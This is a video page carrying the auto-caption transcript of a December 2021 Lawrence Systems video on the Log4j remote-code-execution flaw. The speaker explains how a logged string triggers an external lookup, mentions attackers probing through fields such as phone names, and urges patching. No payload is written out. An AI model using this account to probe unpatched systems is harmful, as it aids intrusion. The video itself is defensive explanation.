Critical Vulnerability In Java log4j Affecting UniFi, Apple, Minecraft, and Many Others!

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
happy friday december 10th of 2021 unless happy friday for anyone dealing with the vulnerability that was recently disclosed on well just december 9th of 2021 in the java log 4j library this is a pretty widespread application affecting companies ranging from tesla to twitter to minecraft and yes it apparently is actively exploitable in minecraft so there's a lot of servers being pushed out and updated right now and i'll be covering from the blog post here over at huntress and along with a reddit post and of course some details that i want to cover including the fact that this has a base cvss score of 10 yes 10 the worst you can get let's start with though a big thanks to kevin beaumont who's been discussing this if you're not familiar or follow kevin beaumont aka gaussy the dog does some really great and solid security research definitely worth following on twitter and i like to thank him for this wonderful logo because i think every exploit needs a logo and i actually like this one because it's a trivial exploit with a trivially drawn logo in ms paint so that made me smile uh because nothing else about this vulnerability makes me smile with one more minor exception the minecraft john hammond targeting minecraft because why not if you're going to do a proof of concept on something why not start with the game obviously this is very serious but let's talk about just how trivial this is there's a lot of places affected by this what should you do now this is where we'll start if your organization uses the log4j library upgrade to and they've got the new version right here log4j 2.150 rc2 but i want to talk about where your risk factor is and kind of how this actually works because the how it works part is mind-blowingly simple and the attacker vector is extremely trivial for threat actors a single string of text can trigger an application to reach out to an external location if it is logged via the vulnerable instance of log4j so if you have a web server a unifi controller a mail server any different service that runs that maybe you want logging and when you think about how it logs it's going to take this log information and you know you write it to var log in the linux world that's pretty common and the facilities that write it are just kind of boring they're going to take the log data and drop it there and boring is okay but sometimes you want to look at it in a little bit more depth and maybe take some action on it and that's where log4j comes in so you actually take in your logs prior to doing and just settling them somewhere for archival reasons you'll actually parse them with log4j that's where the problem comes in and this is what makes this such an easy vulnerability to exploit i've already seen these exploits coming against my own servers but just because you see the exploit being targeted to you does not mean it can be exploited because the way it works is any of these logs being collected the people sending out the requests and the threat actors that have set up beacons and just hammering away at apache servers and anything they can find publicly available on the internet and sending and seeing what comes back they send that command and if the back end of your system is using this log4j this is where companies like tesla twitter and elasticsearch and all these different services have this and if they're using it to parse that log data it's is trivial as that command right here they put in this right here and that's it it will then execute at the permission levels at the level that that log4j library has so if you've run vulnerable application has a high level permission it now can start executing whatever payload was sent to it so it's not necessarily though that everything that depends on this library is going to be exploitable but there's a high probability that things at dependence library are and essentially this comes down to you know wondering how long this has been around we'll actually start here in 2013. so i wanted to do a little bit of research because i was curious you know is this new is this from some update something opened up and it was on parse i did find a few references to this and it makes complete sense this was implemented right around 2013 and it was lookup plugin support basically what this log facility does is if you want to take more action on your log and actually have it trigger different things this is actually very handy we can say hey look up these resources do this information not only look at the log but then take action on it so we can have our server do some type of defined actions and look things up based on the information we find in a log so that implementation was done but it wasn't done properly because they didn't sanitize the input so the execution part comes because of the way you can simply use these couple commands as pointed out right here if you add this right here it's that's it it will then go oh i think you mean to run this so you're taking kind of an advantage of unparsed information that was supposed to be parsed out and sanitized before it went through so it can run the commands and jumping it right to the command so you're injecting a command in a spot that the person who would have wrote the logging tool would have had their command so it's a little bit of a clever hack uh one well in terms of finding it but really trivial in terms of exploiting it so any type of server that happens to be sending input data through this logging facility potentially could be exploited there's going to be all kinds of nuance to how different companies actually do their implementation but obviously it's been it's big enough to have this high of a cbs score and cause a lot of stir in the tech industry right now because it's obviously very very exploitable i was actually happy to see unify how to patch out right away there's no known as of the making of this video vulnerabilities in unify from it but the fact that they're dependent on that library there could be some way even if it's not an obvious way that you could send or get a unify endpoint to create a log that it would parse and then do that because that becomes a little bit tricky because it's not exactly open to the public it's more like the logging facility of each device could possibly make this mail form thing but then could you take over a device and use it this is where a lot of people and other friends i'm mine including riley chase over at hostify who's been pushing up patches as well a lot of people are looking to see if there's a deeper vulnerability that can be found within this because i think it's very important to be clear when i say right now there's not unknown but as long as we know that libraries hanging out in different applications that gives you the idea of poking at each thing until there's a way you can get around it and see if it will actually execute code and this is what people have been doing i've seen people do things like well a little bit confusing but it looks like they could rename even their phone and put in the payload as the name of a phone and allegedly based on a twitter post i've seen that was a way they were able to see if it would beacon out and do a lookup so anything that puts you a little bit closer to there because like i said apple twitter lots of places are using this particular log library it is immensely popular so this is going to be kind of the ripple effect where even though we see a lot of major companies doing it now we know there's probably a lot of things that later on down the road someone will be looking things up and find an application that never updated this particular library and then start poking away at it so it's hard to really determine the entire extent having that library does not always mean exploitable but it certainly means potential for exploit and we'll just kind of have to watch as companies patch this and hopefully they patch it and it's better to patch first before you find out there's a vulnerability which is what unified did they update it to the newer version of library that parses the data properly but is i even seen companies like vmware and i don't know what version they're using but even large companies like that are still using some of these libraries in there so we're going to probably see a just chain of updates that are going on for a long time on this i'll leave links to everything i talked about leave your thoughts and comments down below if you have a system you need to patch patch it if you're running a unified controller which i know a lot of my audience do go ahead and update that to the latest version as of today it was released and i'll leave link to that down below as well all right thanks and thank you for making it all the way to the end of this video if you've enjoyed the content please give us a thumbs up if you would like to see more content from this channel hit the subscribe button and the bell icon if you'd like to hire a sure project head over to lawrences.com and click the hires button right at the top to help this channel out in other ways there's a join button here for youtube and a patreon page where your support is greatly appreciated for deals discounts and offers check out our affiliate links in the description of all of our videos including a link to our shirt store where we have a wide variety of shirts that we sell and designs come out well randomly so check back frequently and finally our forums forums.lawrences.com is where you can have a more in-depth discussion about this video and other tech topics covered on this channel thanks again for watching and look forward to hearing from you you
Info
Channel: Lawrence Systems
Views: 87,357
Rating: undefined out of 5
Keywords: LawrenceSystems, java exploit, log4j exploit minecraft, log4j exploit poc, minecraft exploit, log4j step by step, log4j, log4j exploit, log4j rce, log4j vulnerability, log4j2 exploit, log4j zero day, log4j2, log4j remote code execution exploit in minecraft, log4j tutorial in java, log4j exploit explained, log4j2 minecraft
Id: CvkUPvIMM7o
Channel Id: undefined
Length: 8min 51sec (531 seconds)
Published: Fri Dec 10 2021
Related Videos
Patching UniFi Against The Log4J CVE-2021-44228 Vulnerability
Lawrence Systems
7.2K
How We Do Pricing & Bidding For Structured Cabling Jobs From Start To Finish
Lawrence Systems
72K
Apple, Tesla, Minecraft Hacked - Log4j RCE Vulnerability in Java
codedamn
18K
Cisco Secure Alert: the latest from Talos on the Log4j vulnerability
Cisco
766
DIY Home Rack Build
Lawrence Systems
389K
Log4J Vulnerability: What We Know About CVE-2021-44228
Bishop Fox
15K
Steve Jobs Insult Response - Highest Quality
Jonathan Field
12M
How Tailscale Makes Managing Wireguard Easy
Lawrence Systems
22K
Is The tp-link Omada SDN platform A UniFi Alternative?
Lawrence Systems
75K
Your Old PC is Your New Server
Linus Tech Tips
744K
Tutorial: pfsense and pfBlockerNG Version 3
Lawrence Systems
82K
Log4J Security Vulnerability: CVE-2021-44228 (Log4Shell) - in 7 minutes or less (PATCH NOW!)
DevXplaining
17K
Lots of Great New Changes And Features in UniFi 6.5.53 Controller Update!
Lawrence Systems
77K
2020 Getting started with pfsense 2.4 Tutorial: Network Setup, VLANs, Features & Packages
Lawrence Systems
585K
EXPLODING Glitter Bomb 4.0 vs. Package Thieves
Mark Rober
2.1M
THE FUTURE OF RYZEN CPUS | Zen 4 & Zen 5 - Hybrid Design, Accelerator Technology & Much More
RedGamingTech
7.8K
Rock 3A: Dual M.2 ARM SBC with eMMC socket
ExplainingComputers
68K
The Last Hackintosh?
Snazzy Labs
206K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.